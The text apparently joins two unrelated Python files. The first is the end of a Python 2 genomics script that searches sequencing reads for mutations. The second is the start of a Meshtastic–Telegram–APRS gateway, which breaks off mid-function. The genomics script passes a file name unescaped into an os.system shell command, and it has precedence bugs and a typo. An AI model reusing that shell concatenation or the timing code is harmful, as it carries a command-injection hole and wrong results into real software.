def newFindMutation(read_R, seqs, alignedGroups, log):
numUsefulGroups = 0
ancLen = len(seqs[read_R-1])+len(seqs[read_R])
misInOverlap = 0
for group in alignedGroups:
for rightPartGroup in group.rightPartGroups:
usefulMis = False
for mis in rightPartGroup.mismatches:
validPos = 0
if mis < 0:
for overlaps in rightPartGroup.preConsensus[mis].values():
if overlaps >= requiredOverlaps:
validPos += 1
else:
# if len(rightPartGroup.consensus[pos]) > 2:
# print_alignedGroup(group, rightPartGroup, read_R,
# seqs, log)
for overlaps in rightPartGroup.consensus[mis].values():
if overlaps >= requiredOverlaps:
validPos += 1
if validPos > 1:
usefulMis = True
if mis > group.leftReadsOffset and mis < ancLen:
misInOverlap += 1
if usefulMis and misInOverlap > 0:
print_alignedGroup(group, rightPartGroup, read_R,
seqs, log)
numUsefulGroups += 1
continue
return numUsefulGroups
def oldFindMutation(read_R, seqs, alignedGroups, log):
numUsefulGroups = 0
anchorLen = len(seqs[read_R-1])+len(seqs[read_R])
if log == None:
log = open("usefulGroups/"+str(p_id)+".txt","w")
for group in alignedGroups:
for rightPartGroup in group.rightPartGroups:
# Check if groups contains enough information to analyze
numNormal = len(group.leftPartsN)+len(rightPartGroup.rightPartsN)
if numNormal+1 < requiredOverlaps:
continue
numDiseas = len(group.leftPartsD)+len(rightPartGroup.rightPartsD)
if numDiseas < requiredOverlaps:
continue
isUsefulGroup = False
for mis in rightPartGroup.mismatches:
if isUsefulGroup:
break
if mis < group.leftReadsOffset or mis > anchorLen-1:
continue
muts1 = findMutation(read_R, seqs, group.leftPartsN,
rightPartGroup.rightPartsN, mis, True, log)
muts2 = findMutation(read_R, seqs, group.leftPartsD,
rightPartGroup.rightPartsD, mis, False, log)
for mut1 in muts1:
for mut2 in muts2:
if mut1 != mut2 and not isUsefulGroup:
read = seqs[read_R]
print_compare(read, mis, mut1,
rightPartGroup.consensus, log)
isUsefulGroup = True
numUsefulGroups += 1
print_alignedGroup(group, rightPartGroup, read_R,
seqs, log)
return numUsefulGroups
def findMutation(read_R, seqs, leftparts, rightparts, mutationsPos, first, log):
# Test that the size of the group is big enough to infer any info
# if (len(leftparts)+len(rightparts)) < 3:
# return "Fail"
count = 0
validBPs = []
#for mutationsPos in mismatches:
# print "mutPos", mutationsPos
#firstSampleBP = set()
mutationBPsLeft = dict()
mutationBPsRight = dict()
# Get bp in anchor point
if first and read_R < secondSample or \
not first and read_R > secondSample:
read = seqs[read_R-1]+seqs[read_R]
if mutationsPos > 0 and mutationsPos < len(read):
#firstSampleBP.add(read[mutationsPos])
bp = read[mutationsPos]
mutationBPsRight[bp] = mutationBPsRight.get(bp, 0) + 1
# Get bp in leftparts
for read_L in leftparts:
for offset in leftparts[read_L]:
offset += len(seqs[read_L])
if mutationsPos < offset:
continue
read = seqs[read_L]+seqs[read_L+1]
if mutationsPos > len(read)+offset-1:
continue
# print read[mutationsPos-offset-1]
# print read[mutationsPos-offset]
# print read[mutationsPos-offset+1]
count += 1
#firstSampleBP.add(read[mutationsPos-offset])
bp = read[mutationsPos-offset]
mutationBPsLeft[bp] = mutationBPsLeft.get(bp, 0) + 1
# Get bp in rightparts
for next_read_R in rightparts:
for offset in rightparts[next_read_R]:
if mutationsPos < offset:
continue
read = seqs[next_read_R-1]+seqs[next_read_R]
if mutationsPos > len(read)+offset-1:
continue
# print mutationsPos-offset
# print read[mutationsPos-offset-1]
# print read[mutationsPos-offset]
# print read[mutationsPos-offset+1]
# print mutationsPos
# print offset
# print read_R
# print read
# print len(read)
count += 1
#firstSampleBP.add(read[mutationsPos-offset])
bp = read[mutationsPos-offset]
mutationBPsRight[bp] = mutationBPsRight.get(bp, 0) + 1
for bp in mutationBPsRight:
overlapsLeft = mutationBPsLeft.get(bp, 0)
if overlapsLeft > 0:
if mutationBPsRight[bp]+overlapsLeft >= requiredOverlaps:
validBPs.append(bp)
return validBPs
# ************************************************************************** #
# #
# Sequence Align All Reads #
# #
# ************************************************************************** #
def seqAlignAllReads(fasta_file, log):
seqs = getAllReads(fasta_file, log)
numParts = len(seqs)/2
prog = 0
tim = time.clock()
for read_R in xrange(1,len(seqs),2):
alignedGroups = []
# Align left parts
alignLeft(read_R, seqs, alignedGroups, log)
# Align right parts
alignRight(read_R, seqs, alignedGroups, log)
# print_alignedGroups(alignedGroups, read_R, seqs, log)
# sys.exit()
prog += 1
if prog % 500 == 0:
logprint(log, False, "Processed", prog, "of", numParts,
"right parts in", (time.clock()-tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
global c1
logprint(log, False, "left parts aligned:", c1)
c1 = 0
global c2
logprint(log, True, "right parts aligned:", c2)
c2 = 0
logprint(log, False, "Finished sequence alignment",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
logprint(log, False, "c1:", c1)
logprint(log, False, "c2:", c2)
logprint(log, False, "c3:", c3)
logprint(log, False, "c4:", c4)
logprint(log, False, "c5:", c5)
logprint(log, False, "c6:", c6)
logprint(log, False, "c7:", c7)
logprint(log, False, "numReadL:", numreadL)
logprint(log, False, "numReadR:", numreadR)
def alignLeft(read_R, seqs, alignedGroups, log):
readROffset = len(seqs[read_R-1])
for read_L in xrange(0,len(seqs),2):
#print seqs[read_R]
#print seqs[read_L]
for alignInfo in findAlignment(read_R, read_L, seqs,
readROffset, M1, log):
#offset += len(seqs[read_R-1])
offset, mis, lenCompared = alignInfo
global numreadL
numreadL += 1
#print offset
newGroup = True
for group in alignedGroups:
if fitsInGroup(group, seqs, read_R, read_L, alignInfo, offset, M2):
# Add read_L to group
global c1
c1 += 1
if read_L in group.leftParts:
group.leftParts[read_L].append(offset)
else:
group.leftParts[read_L] = [offset]
# Fits in group, so don't create new group
newGroup = False
break
# If read_L doesn't fit in any group, then create a new
if newGroup:
global c7
c7 += 1
group = AlignedGroup(read_R, readROffset, offset+readROffset)
# Start of extra part - offsetExtraPart
start = len(seqs[read_R]) - offset
#group.consensusRight = seqs[read_L][start:] + seqs[read_L+1]
# Add read_L to new the group
group.leftParts[read_L] = [offset]
group.leftReadsOffset = offset+group.readROffset
group.mismatches = mis
# Add anchor point to consensus
for bp in ''.join((seqs[read_R-1], seqs[read_R])):
group.consensus.append({bp:1})
# Add overlapping part of read_L to consensus
for index in xrange(start):
i = index + group.readROffset + offset
bp = seqs[read_L][index]
group.consensus[i][bp] = group.consensus[i].get(bp, 0) + 1
# Add the rest of read_L to consensus
for bp in ''.join((seqs[read_L][start:], seqs[read_L+1])):
group.consensus.append({bp:1})
# Append new group to the other groups
alignedGroups.append(group)
def alignRight(read_R, seqs, alignedGroups, log):
for group in alignedGroups:
for read_L in group.leftParts:
for next_read_R in xrange(1,len(seqs),2):
if read_R != next_read_R and \
next_read_R not in group.checkedRightParts:
seq_next_read_R = seqs[next_read_R-1]+seqs[next_read_R]
st = group.maxLeftReadsOffset
for offset in xrange(st-len(seq_next_read_R)+10, st):
global numreadR
numreadR += 1
testRead(group, seqs, read_R, next_read_R,
offset, M2, log)
group.checkedRightParts.add(next_read_R)
# ************************************************************************** #
# #
# Main #
# #
# ************************************************************************** #
def main():
"""
Main method of the program
"""
totim = time.clock()
# s1 = "TACTCGCAATATCAAGCCTTATGGTTTATTCGTTCCTATGATCAGGATGA"
# s2 = "TCAAGCCTTATGGTTTATTCGTTCCTATGATCAGGATGATCATCAACTTC"
# print globalAlignment(s1, s2, 38, True)
# sys.exit()
# Parse command line options
fasta_file, normal_file, diseased_file, k, threshold, bands, rows, \
minhash_alg, seed, log_file, input_file, output_file, test \
= optionParse()
# For testing only
# input_file = "candidate_pairs_k_16_b_2_r_5_m_6.txt"
# n (number of hash functions = length of minhash signature) is given by
# n = bands * rows
with open(log_file, 'w') as log:
if input_file:
candidatePairs = importCandidatePairs(input_file, log)
else:
# candidatePairs = runLSH(fasta_file, bands, rows, n, k, seed,
# minhash_alg, log)
multiProcessing = False
if multiProcessing:
p_size = bands
# pool = Pool(processes=p_size)
pool = None
candidatePairs = runLSH(normal_file, diseased_file, bands,
rows, k, seed, minhash_alg, test, log,
multiProcessing, pool)
else:
candidatePairs = runLSH(normal_file, diseased_file, bands,
rows, k, seed, minhash_alg, test, log,
multiProcessing, None)
if output_file:
output = "candidate_pairs_k_"+str(k)+"_b_"+str(bands)+"_r_"+ \
str(rows)+"_m_"+str(minhash_alg)
exportCandidatePairs(candidatePairs, output_file, log)
if test == 0:
"""
Stop after the LSH step.
"""
print "Total time used:", time.clock() - totim / 60, "minutes"
sys.exit()
elif test == 1:
"""
Test S-curve distribution
"""
makeSPlot(normal_file, candidatePairs, k, bands, rows,
minhash_alg, log)
elif test == 2:
"""
Test which pairs are found by LSH
"""
pairsFoundByLSH(normal_file, diseased_file, candidatePairs, k,
bands, rows, log)
elif test == 3:
"""
Test different k values
"""
if fasta_file:
os.system("echo '"+str(k)+"\t"+str(candidatePairs[0])+"\t"+
str(candidatePairs[1])+"\t"+
str(candidatePairs[2])+"' >> "+fasta_file)
elif test == 4:
"""
Count number of candidate pairs satisfying the naive sim
"""
naiveSim = 0.97
total = 0
satisfying = 0
seqs = getAllReads(normal_file, log) + \
getAllReads(diseased_file, log)
for doc1 in candidatePairs:
for doc2 in candidatePairs[doc1]:
naive = globalAlignment(seqs[doc1],seqs[doc2], 32)
if naive >= naiveSim:
satisfying += 1
else:
logprint(log, False, seqs[doc1], "\n"+seqs[doc2],
"\n"+str(naive), "\n")
total += 1
logprint(log, False, "Satisfying naive sim:", satisfying)
logprint(log, False, "Total pairs:", total)
logprint(log, False, "Ratio:", float(satisfying)/total)
elif test == 5:
p_size = bands
# pool = Pool(processes=p_size)
pool = None
initMultiSeqAlign(normal_file, diseased_file, candidatePairs,
pool, p_size, log)
else:
# If no test to run on LSH, continue with constructing groups of aligned reads
#findMutations(candidatePairs, normal_file, diseased_file, log)
sequenceAlignment(candidatePairs, normal_file, diseased_file, log)
logprint(log, True, "Total time used:", (time.clock() - totim) / 60,
"minutes")
return (time.clock() - totim)
### For Testing ###
reads = getAllReads(fasta_file, log)
findSimPairs = False
if findSimPairs:
findSimilarPairs(reads, candidatePairs, k, bands, rorws,
minhash_alg, log)
else:
validateJaccardSim(reads, candidatePairs, k, bands, rows,
minhash_alg, log)
print "Total time used:", time.clock() - totim / 60, "minutes"
if __name__ == '__main__':
"""
Main method call
"""
main()
sys.exit(0)
|
mesh.py
|
#!/usr/bin/env python3
"""Meshtastic Telegram Gateway"""
#
import configparser
import logging
import sys
import time
#
from datetime import datetime, timedelta
from threading import Thread
from typing import (
AnyStr,
Dict,
List,
)
from urllib.parse import parse_qs
#
import aprslib
import flask
import haversine # type: ignore
import humanize # type: ignore
import telegram.ext
#
from flask import Flask, jsonify, make_response, request, render_template
from flask.views import View
from meshtastic import (
BROADCAST_ADDR as MESHTASTIC_BROADCAST_ADDR,
LOCAL_ADDR as MESHTASTIC_LOCAL_ADDR,
serial_interface as meshtastic_serial_interface,
portnums_pb2 as meshtastic_portnums_pb2
)
from pony.orm import db_session, Database, Optional, PrimaryKey, Required, Set, set_sql_debug
from pubsub import pub
from telegram import Update
from telegram.ext import CallbackContext
from telegram.ext import CommandHandler
from telegram.ext import Updater
from telegram.ext import MessageHandler, Filters
from werkzeug.serving import make_server
# has to be global variable ;-(
DB = Database()
with open('VERSION', 'r', encoding='utf-8') as fh:
VERSION = fh.read().rstrip('\n')
LOGFORMAT = '%(asctime)s - %(name)s/v{} - %(levelname)s file:%(filename)s %(funcName)s line:%(lineno)s %(message)s'
LOGFORMAT = LOGFORMAT.format(VERSION)
def get_lat_lon_distance(latlon1: tuple, latlon2: tuple) -> float:
"""
Get distance (in meters) between two geographical points using GPS coordinates
:param latlon1:
:param latlon2:
:return:
"""
if not isinstance(latlon1, tuple):
raise RuntimeError('Tuple expected for latlon1')
if not isinstance(latlon2, tuple):
raise RuntimeError('Tuple expected for latlon2')
return haversine.haversine(latlon1, latlon2, unit=haversine.Unit.METERS)
def setup_logger(name=__name__, level=logging.INFO) -> logging.Logger:
"""
Set up logger and return usable instance
:param name:
:param level:
:return:
"""
logger = logging.getLogger(name)
logger.setLevel(level)
# create console handler and set level to debug
handler = logging.StreamHandler()
handler.setLevel(level)
# create formatter
formatter = logging.Formatter(LOGFORMAT)
# add formatter to ch
handler.setFormatter(formatter)
# add ch to logger
logger.addHandler(handler)
return logger
class Config:
"""
Config - two level configuration with functionality similar to dotted dict
"""
def __init__(self, config_path="mesh.ini"):
self.config_path = config_path
self.config = None
self.elements = []
def read(self):
"""
Read configuration file
:return:
"""
self.config = configparser.ConfigParser()
self.config.read(self.config_path)
@staticmethod
def enforce_type(value_type, value):
"""
Enforce selected type
:param value_type:
:param value:
:return:
"""
if value_type == bool:
if value.lower() == 'true':
return True
return False
return value_type(value)
def __getattr__(self, attr):
if self.config is None:
raise AttributeError('config is empty')
if len(self.elements) < 2:
self.elements.append(attr)
if len(self.elements) == 2:
result = self.config[self.elements[0]][self.elements[1]]
self.elements = []
return result
return self
class TelegramConnection:
"""
Telegram connection
"""
def __init__(self, token: str, logger: logging.Logger):
self.logger = logger
self.updater = Updater(token=token, use_context=True)
def send_message(self, *args, **kwargs) -> None:
"""
Send Telegram message
:param args:
:param kwargs:
:return:
"""
self.updater.bot.send_message(*args, **kwargs)
def poll(self) -> None:
"""
Run Telegram bot polling
:return:
"""
self.updater.start_polling()
@property
def dispatcher(self) -> telegram.ext.Dispatcher:
"""
Return Telegram dispatcher for commands
:return:
"""
return self.updater.dispatcher
class MeshtasticConnection:
"""
Meshtastic device connection
"""
def __init__(self, dev_path: str, logger: logging.Logger):
self.dev_path = dev_path
self.interface = None
self.logger = logger
def connect(self):
"""
Connect to Meshtastic device. Interface can be later updated during reboot procedure
:return:
"""
self.interface = meshtastic_serial_interface.SerialInterface(devPath=self.dev_path, debugOut=sys.stdout)
def send_text(self, *args, **kwargs) -> None:
"""
Send Meshtastic message
:param args:
:param kwargs:
:return:
"""
self.interface.sendText(*args, **kwargs)
def node_info(self, node_id) -> Dict:
"""
Return node information for a specific node ID
:param node_id:
:return:
"""
return self.interface.nodes.get(node_id, {})
def reboot(self):
"""
Execute Meshtastic device reboot
:return:
"""
self.logger.info("Reboot requested...")
self.interface.getNode(MESHTASTIC_LOCAL_ADDR).reboot(10)
self.interface.close()
time.sleep(20)
self.connect()
self.logger.info("Reboot completed...")
@property
def nodes(self) -> Dict:
"""
Return dictionary of nodes
:return:
"""
return self.interface.nodes if self.interface.nodes else {}
@property
def nodes_with_info(self) -> List:
"""
Return list of nodes with information
:return:
"""
node_list = []
for node in self.nodes:
node_list.append(self.nodes.get(node))
return node_list
@property
def nodes_with_position(self) -> List:
"""
Filter out nodes without position
:return:
"""
node_list = []
for node_info in self.nodes_with_info:
if not node_info.get('position'):
continue
node_list.append(node_info)
return node_list
@property
def nodes_with_user(self) -> List:
"""
Filter out nodes without position or user
:return:
"""
node_list = []
for node_info in self.nodes_with_position:
if not node_info.get('user'):
continue
node_list.append(node_info)
return node_list
class MeshtasticNodeRecord(DB.Entity): # pylint:disable=too-few-public-methods
"""
MeshtasticNodeRecord: node record representation in DB
"""
nodeId = PrimaryKey(str)
nodeName = Required(str)
lastHeard = Required(datetime)
hwModel = Required(str)
locations = Set(lambda: MeshtasticLocationRecord)
messages = Set(lambda: MeshtasticMessageRecord)
class MeshtasticLocationRecord(DB.Entity): # pylint:disable=too-few-public-methods
"""
MeshtasticLocationRecord: location record representation in DB
"""
datetime = Required(datetime)
altitude = Required(float)
batteryLevel = Required(float)
latitude = Required(float)
longitude = Required(float)
rxSnr = Required(float)
node = Optional(MeshtasticNodeRecord)
class MeshtasticMessageRecord(DB.Entity): # pylint:disable=too-few-public-methods
"""
MeshtasticMessageRecord: message record representation in DB
"""
datetime = Required(datetime)
message = Required(str)
node = Optional(MeshtasticNodeRecord)
class MeshtasticFilterRecord(DB.Entity):
"""
MeshtasticFilterRecord: filter representation in DB
"""
# meshtastic, telegram, etc...
connection = Required(str)
item = Required(str)
reason = Required(str)
active = Required(bool)
class MeshtasticDB:
"""
Meshtastic events database
"""
def __init__(self, db_file: AnyStr, connection: MeshtasticConnection, logger: logging.Logger):
self.connection = connection
self.logger = logger
DB.bind(provider='sqlite', filename=db_file, create_db=True)
DB.generate_mapping(create_tables=True)
@db_session
def get_node_record(self, node_id: AnyStr) -> MeshtasticNodeRecord:
"""
Retrieve node record from DB
:param node_id:
:return:
"""
node_record = MeshtasticNodeRecord.select(lambda n: n.nodeId == node_id).first()
node_info = self.connection.node_info(node_id)
last_heard = datetime.fromtimestamp(node_info.get('lastHeard', 0))
if not node_record:
# create new record
node_record = MeshtasticNodeRecord(
nodeId=node_id,
nodeName=node_info.get('user', {}).get('longName', ''),
lastHeard=last_heard,
hwModel=node_info.get('user', {}).get('hwModel', ''),
)
return node_record
# Update lastHeard and return record
node_record.lastHeard = last_heard # pylint:disable=invalid-name
return node_record
@staticmethod
@db_session
def get_stats(node_id: AnyStr) -> AnyStr:
"""
Get node stats
:param node_id:
:return:
"""
node_record = MeshtasticNodeRecord.select(lambda n: n.nodeId == node_id).first()
return f"Locations: {len(node_record.locations)}. Messages: {len(node_record.messages)}"
@db_session
def store_message(self, packet: dict) -> None:
"""
Store Meshtastic message in DB
:param packet:
:return:
"""
from_id = packet.get("fromId")
node_record = self.get_node_record(from_id)
decoded = packet.get('decoded')
message = decoded.get('text', '')
# Save meshtastic message
MeshtasticMessageRecord(
datetime=datetime.fromtimestamp(time.time()),
message=message,
node=node_record,
)
@db_session
def store_location(self, packet: dict) -> None:
"""
Store Meshtastic location in DB
:param packet:
:return:
"""
from_id = packet.get("fromId")
node_record = self.get_node_record(from_id)
# Save location
position = packet.get('decoded', {}).get('position', {})
# add location to DB
MeshtasticLocationRecord(
datetime=datetime.fromtimestamp(time.time()),
altitude=position.get('altitude', 0),
batteryLevel=position.get('batteryLevel', 100),
latitude=position.get('latitude', 0),
longitude=position.get('longitude', 0),
rxSnr=packet.get('rxSnr', 0),
node=node_record,
)
class Filter:
"""
Filter parent class
"""
connection_type = ""
def __init__(self, database: MeshtasticDB, config: Config, connection: MeshtasticConnection,
logger: logging.Logger):
self.database = database
self.connection = connection
self.config = config
self.logger = logger
class TelegramFilter(Filter):
"""
Telegram users filter
"""
def __init__(self, database: MeshtasticDB, config: Config, connection: MeshtasticConnection,
logger: logging.Logger):
super().__init__(database, config, connection, logger)
self.database = database
self.config = config
self.connection = connection
self.connection_type = "Telegram"
self.logger = logger
class MeshtasticFilter(Filter):
"""
Meshtastic users filter
"""
def __init__(self, database: MeshtasticDB, config: Config, connection: MeshtasticConnection,
logger: logging.Logger):
super().__init__(database, config, connection, logger)
self.database = database
self.config = config
self.connection = connection
self.connection_type = "Meshtastic"
self.logger = logger
class CallSignFilter(Filter):
"""
APRS callsign filter
"""
def __init__(self, database: MeshtasticDB, config: Config, connection: MeshtasticConnection,
logger: logging.Logger):
super().__init__(database, config, connection, logger)
self.database = database
self.config = config
self.connection = connection
self.connection_type = "Callsign"
self.logger = logger
class APRSStreamer:
"""
APRS streamer
"""
def __init__(self, config: Config):
self.aprs_is = None
self.filter = None
self.config = config
self.logger = None
self.exit = False
def set_logger(self, logger: logging.Logger):
"""
Set class logger
:param logger:
:return:
"""
self.logger = logger
def set_filter(self, filter_class: CallSignFilter):
"""
Set APRS callsign filter class
:param filter_class:
:return:
"""
self.filter = filter_class
def send_packet(self, packet):
"""
Send APRS packet
:param packet:
:return:
"""
if not self.config.enforce_type(bool, self.config.APRS.FromMeshtastic):
return
self.aprs_is.sendall(packet)
def process(self, packet):
"""
Process APRS packet
:param packet:
:return:
"""
if not self.config.enforce_type(bool, self.config.APRS.ToMeshtastic):
return
self.logger.debug(packet)
@staticmethod
def callback(packet):
"""
APRS packet callback
:param packet:
:return:
"""
pub.sendMessage('APRS', packet=packet)
def run_loop(self):
"""
APRS streamer loop
:return:
"""
self.aprs_is = aprslib.IS(self.config.APRS.Callsign,
self.config.APRS.Password,
host='euro.aprs2.net',
port=14580)
f_filter = f"r/{self.config.enforce_type(float, self.config.WebApp.Center_Latitude)}/"
f_filter += f"{self.config.enforce_type(float, self.config.WebApp.Center_Longitude)}/50"
self.aprs_is.set_filter(f_filter)
#
while not self.exit:
try:
self.aprs_is.connect()
self.aprs_is.consumer(self.callback, immortal=True)
except KeyboardInterrupt:
break
except aprslib.exceptions.ConnectionDrop:
self.logger.debug("aprs conn drop")
except aprslib.exceptions.LoginError:
self.logger.debug("aprs login error")
def run(self):
"""
APRS runner
:return:
"""
if self.config.enforce_type(bool, self.config.APRS.Enabled):
pub.subscribe(self.process, 'APRS')
thread = Thread(target=self.run_loop, daemon=True)
thread.start()
class TelegramBot:
"""
Telegram bot
"""
def __init__(self, config: Config, meshtastic_connection: MeshtasticConnection,
telegram_connection: TelegramConnection):
self.config = config
self.filter = None
self.logger = None
self.meshtastic_connection = meshtastic_connection
self.telegram_connection = telegram_connection
start_handler = CommandHandler('start', self.start)
node_handler = CommandHandler('nodes', self.nodes)
reboot_handler = CommandHandler('reboot', self.reboot)
dispatcher = self.telegram_connection.dispatcher
dispatcher.add_handler(start_handler)
dispatcher.add_handler(node_handler)
dispatcher.add_handler(reboot_handler)
echo_handler = MessageHandler(Filters.text & (~Filters.command), self.echo)
dispatcher.add_handler(echo_handler)
def set_logger(self, logger: logging.Logger):
"""
Set class logger
:param logger:
:return:
"""
self.logger = logger
def set_filter(self, filter_class: TelegramFilter):
"""
Set filter class
:param filter_class:
:return:
"""
self.filter = filter_class
def echo(self, update: Update, _) -> None:
"""
Telegram bot echo handler. Does actual message forwarding
:param update:
:param _:
:return:
"""
if update.effective_chat.id != self.config.enforce_type(int, self.config.Telegram.Room):
self.logger.debug("%d %s",
update.effective_chat.id,
self.config.enforce_type(int, self.config.Telegram.Room))
return
full_user = update.effective_user.first_name
if update.effective_user.last_name is not None:
full_user += ' ' + update.effective_user.last_name
self.logger.debug(f"{update.effective_chat.id} {full_user} {update.message.text}")
self.meshtastic_connection.send_text(f"{full_user}: {update.message.text}")
def poll(self) -> None:
"""
Telegram bot poller. Uses connection under the hood
:return:
"""
self.telegram_connection.poll()
@staticmethod
def start(update: Update, context: CallbackContext) -> None:
"""
Telegram /start command handler.
:param update:
:param context:
:return:
"""
context.bot.send_message(chat_id=update.effective_chat.id, text="I'm a bot, please talk to me!")
def reboot(self, update: Update, context: CallbackContext) -> None:
"""
Telegram reboot command
:param update:
:param context:
:return:
"""
if update.effective_chat.id != self.config.enforce_type(int, self.config.Telegram.Admin):
self.logger.info("Reboot requested by non-admin: %d", update.effective_chat.id)
return
context.bot.send_message(chat_id=update.effective_chat.id, text="Requesting reboot...")
self.meshtastic_connection.reboot()
def nodes(self, update: Update, context: CallbackContext) -> None:
"""
Returns list of nodes to user
:param update:
:param context:
:return:
"""
table = self.meshtastic_connection.interface.showNodes(includeSelf=False)
context.bot.send_message(chat_id=update.effective_chat.id, text=table)
def run(self):
"""
Telegram bot runner
:return:
"""
thread = Thread(target=self.poll)
thread.start()
class MeshtasticBot:
"""
Meshtastic bot
"""
def __init__(self, database: MeshtasticDB, config: Config, meshtastic_connection: MeshtasticConnection,
telegram_connection: TelegramConnection):
self.database = database
self.config = config
self.filter = None
self.logger = None
self.telegram_connection = telegram_connection
self.meshtastic_connection = meshtastic_connection
# track ping request/reply
self.ping_container = {}
def set_logger(self, logger: logging.Logger):
"""
Set class logger
:param logger:
:return:
"""
self.logger = logger
def set_filter(self, filter_class: MeshtasticFilter):
"""
Set filter class
:param filter_class:
:return:
"""
self.filter = filter_class
def on_connection(self, interface, topic=pub.AUTO_TOPIC):
"""
on radio connection event
:param interface:
:param topic:
:return:
"""
self.logger.debug("connection on %s topic %s", interface, topic)
def on_node_info(self, node, interface):
"""
on node information event
:param node:
:param interface:
:return:
"""
self.logger.debug("node info %s on interface %s", node, interface)
def subscribe(self) -> None:
"""
Subscribe to Meshtastic events
:return:
"""
pub.subscribe(self.on_receive, "meshtastic.receive")
pub.subscribe(self.on_connection, "meshtastic.connection.established")
pub.subscribe(self.on_connection, "meshtastic.connection.lost")
@staticmethod
def process_distance_command(packet, interface) -> None: # pylint:disable=too-many-locals
"""
Process /distance Meshtastic command
:param packet:
:param interface:
:return:
"""
from_id = packet.get('fromId')
mynode_info = interface.nodes.get(from_id)
if not mynode_info:
interface.sendText("distance err: no node info", destinationId=from_id)
return
position = mynode_info.get('position', {})
if not position:
interface.sendText("distance err: no position", destinationId=from_id)
return
my_latitude = position.get('latitude')
my_longitude = position.get('longitude')
if not (my_latitude and my_longitude):
interface.sendText("distance err: no lat/lon", destinationId=from_id)
return
for node in interface.nodes:
node_info = interface.nodes.get(node)
position = node_info.get('position', {})
if not position:
continue
latitude = position.get('latitude')
longitude = position.get('longitude')
if not (latitude and longitude):
continue
user = node_info.get('user', {})
if not user:
continue
node_id = user.get('id', '')
if from_id == node_id:
continue
long_name = user.get('longName', '')
distance = round(get_lat_lon_distance((my_latitude, my_longitude), (latitude, longitude)))
distance = humanize.intcomma(distance)
msg = f"{long_name}: {distance}m"
interface.sendText(msg, destinationId=from_id)
def process_ping_command(self, packet, interface) -> None:
"""
Process /ping Meshtastic command
:param packet:
:param interface:
:return:
"""
from_id = packet.get('fromId')
self.ping_container[from_id] = {'timestamp': time.time()}
payload = str.encode("test string")
interface.sendData(payload,
MESHTASTIC_BROADCAST_ADDR,
portNum=meshtastic_portnums_pb2.PortNum.REPLY_APP,
wantAck=True, wantResponse=True)
def process_stats_command(self, packet, _) -> None:
"""
Process /stats Meshtastic command
:param packet:
:param _:
:return:
"""
from_id = packet.get('fromId')
msg = self.database.get_stats(from_id)
self.meshtastic_connection.send_text(msg, destinationId=from_id)
def process_meshtastic_command(self, packet, interface) -> None:
"""
Process Meshtastic command
:param packet:
:param interface:
:return:
"""
decoded = packet.get('decoded')
from_id = packet.get('fromId')
msg = decoded.get('text', '')
if msg.startswith('/distance'):
self.process_distance_command(packet, interface)
return
if msg.startswith('/ping'):
self.process_ping_command(packet, interface)
return
if msg.startswith('/stats'):
self.process_stats_command(packet, interface)
return
if msg.startswith('/reboot') and from_id == self.config.Meshtastic.Admin:
self.meshtastic_connection.reboot()
return
self.meshtastic_connection.send_text("unknown command", destinationId=from_id)
def process_pong(self, packet):
"""
:param packet:
:return:
"""
from_id = packet.get('fromId')
to_id = packet.get('toId')
rx_time = packet.get('rxTime', 0)
rx_snr = packet.get('rxSnr', 0)
processing_time = time.time() - rx_time
# node info
node_info = self.meshtastic_connection.node_info(to_id)
user_info = node_info.get('user', {})
remote_name = user_info.get('longName', to_id)
#
if self.ping_container.get(from_id, {}):
timestamp = self.ping_container[from_id].get('timestamp', 0)
processing_time += time.time() - timestamp
msg = f"Pong from {remote_name} at {rx_snr:.2f} SNR time={processing_time:.3f}s"
self.meshtastic_connection.send_text(msg, destinationId=from_id)
def on_receive(self, packet, interface) -> None:
"""
onReceive is called when a packet arrives
:param packet:
:param interface:
:return:
"""
self.logger.debug(f"Received: {packet}")
to_id = packet.get('toId')
decoded = packet.get('decoded')
from_id = packet.get('fromId')
if decoded.get('portnum') != 'TEXT_MESSAGE_APP':
# notifications
if decoded.get('portnum') == 'POSITION_APP':
self.database.store_location(packet)
return
# pong
if decoded.get('portnum') == 'REPLY_APP':
self.process_pong(packet)
return
# updater.bot.send_message(chat_id=MESHTASTIC_ADMIN, text="%s" % decoded)
# self.logger.debug(decoded)
return
# ignore non-broadcast messages
if to_id != MESHTASTIC_BROADCAST_ADDR:
return
# Save messages
self.database.store_message(packet)
# Process commands and forward messages
node_info = interface.nodes.get(from_id)
long_name = from_id
if node_info is not None:
user_info = node_info.get('user')
long_name = user_info.get('longName')
msg = decoded.get('text', '')
# skip commands
if msg.startswith('/'):
self.process_meshtastic_command(packet, interface)
return
self.telegram_connection.send_message(chat_id=self.config.enforce_type(int, self.config.Telegram.Room),
text=f"{long_name}: {msg}")
class RenderTemplateView(View):
"""
Generic HTML template renderer
"""
def __init__(self, template_name):
self.template_name = template_name
def dispatch_request(self) -> AnyStr:
"""
Process Flask request
:return:
"""
return render_template(self.template_name, timestamp=int(time.time()))
class RenderScript(View):
"""
Specific script renderer
"""
def __init__(self, config: Config):
self.config = config
def dispatch_request(self) -> flask.Response:
"""
Process Flask request
:return:
"""
response = make_response(render_template(
"script.js",
api_key=self.config.WebApp.APIKey,
redraw_markers_every=self.config.WebApp.RedrawMarkersEvery,
center_latitude=self.config.enforce_type(float, self.config.WebApp.Center_Latitude),
center_longitude=self.config.enforce_type(float, self.config.WebApp.Center_Longitude),
))
response.headers['Content-Type'] = 'application/javascript'
return response
class RenderDataView(View):
"""
Specific data renderer
"""
def __init__(self, config: Config, meshtastic_connection: MeshtasticConnection, logger: logging.Logger):
self.config = config
self.logger = logger
self.meshtastic_connection = meshtastic_connection
@staticmethod
def format_hw(hw_model: AnyStr) -> AnyStr:
"""
Format hardware model
:param hw_model:
:return:
"""
if hw_model == 'TBEAM':
return '<a href="https://meshtastic.org/docs/hardware/supported/tbeam">TBEAM</a>'
if hw_model.startswith('TLORA'):
return '<a href="https://meshtastic.org/docs/hardware/supported/lora">TLORA</a>'
return hw_model
def dispatch_request(self) -> flask.Response: # pylint:disable=too-many-locals
"""
Process Flask request
:return:
"""
query_string = parse_qs(request.query_string)
tail_value = self.config.enforce_type(int, self.config.WebApp.LastHeardDefault)
#
tail = query_string.get(b'tail', [])
if len(tail) > 0:
try:
tail_value = int(tail[0].decode())
except ValueError:
self.logger.error("Wrong tail value: ", tail)
#
name = ''
name_qs = query_string.get(b'name', [])
if len(name_qs) > 0:
name = name_qs[0].decode()
nodes = []
for node_info in self.meshtastic_connection.nodes_with_user:
position = node_info.get('position', {})
